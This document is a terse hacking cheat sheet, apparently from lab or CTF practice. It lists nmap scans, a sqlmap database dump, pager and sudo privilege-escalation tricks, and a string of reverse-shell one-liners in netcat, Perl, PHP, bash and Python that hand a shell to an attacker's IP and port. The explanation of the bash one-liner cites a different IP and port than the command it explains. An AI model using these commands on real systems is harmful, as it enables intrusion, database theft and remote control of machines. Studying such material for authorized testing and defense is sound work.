hack note

sudo nmap -sSV IP-Address

sudo nmap -sC -sV -Pn IP-Address

sudo nmap -sV -f -vv -Pn IP-Address

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn IP-Address

sudo nmap -p80,22 -sC -sV IP-Address -oN targeted

 

puttygen key.txt -O private-openssh -o id_rsa

ssh -i id_rsa [email protected]

 

 

python3 -c 'import pty; pty.spawn("/bin/sh")'

 

sudo -i passwd root

 

sudo systemctl status trail.service --> !sh

 

sqlmap -r request.req -p id --dump

 

nc -nlvp 8080

nc 127.0.0.1 8080

nc 127.0.0.1 8080 –e /bin/bash

nc.exe 127.0.0.1 8080 –e cmd.exe

 

perl -e ‘use Socket;$i=”192.168.100.113″;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

 

php -r ‘$sock=fsockopen(“192.168.100.113”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’

 

Command:

 

bash -i >& /dev/tcp/10.10.14.46/8443 0>&1

 

Explanation:

 

This command uses bash to create a network connection with the IP address 192.168.56.102 over port 8080. In order for this to work, the host 192.168.56.102 must have some sort of listener like netcat or Metasploit's multi/handler actively listening on port 8080. Bash -i makes an interactive instance of bash. First of all, there are three default files in bash. stdin which is standard input such as from the keyboard, stdout which is standard output such as the terminal, and stderr which is standard error, which is where errors are ouput. The file descriptors for stdin, stdout, and stderr are 0, 1, and 2 respectively. The >& causes it to send standard output and standard error to be sent through the connection /dev/tcp/192.168.56.101/8080, and 0>&1 sets standard input to be read through the connection.

 

 

Command:

 

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.46",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

python3 import socket,os,pty;s=socket.socket();s.connect(("<10.10.14.46>",2222));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")

 

 

Explanation:

 

This next command is a simple one liner that uses Python code to import the socket library, and initiate a network socket to the IP address and port specified within s.connect, which will connect to the listening server.

 

 

Command:

 

python3 -c 'import pty; pty.spawn("/bin/sh")'

 

Explanation:

 

Let's take a look at this simple command here. This is a Python one liner to import the pty library which handles pseudo terminal utilities, and attempts to spawn a /bin/sh shell.

 

 

Command:

 

/bin/sh -i

 

./bin/bash -p

 

Explanation:

 

This command spawns a /bin/sh shell by trying to run the command interactively with the -i switch.

 

sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

 

Resources:

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.tldp.org/LDP/abs/html/io-redirection.html

https://unix.stackexchange.com/questions/116010/meaning-of-bash-i-dev-tcp-host-port-01

https://netsec.ws/?p=337

https://github.com/alexxy/netdiscover

https://highon.coffee/blog/nmap-cheat-sheet/

https://cirt.net/Nikto2

https://tools.kali.org/web-applications/dirb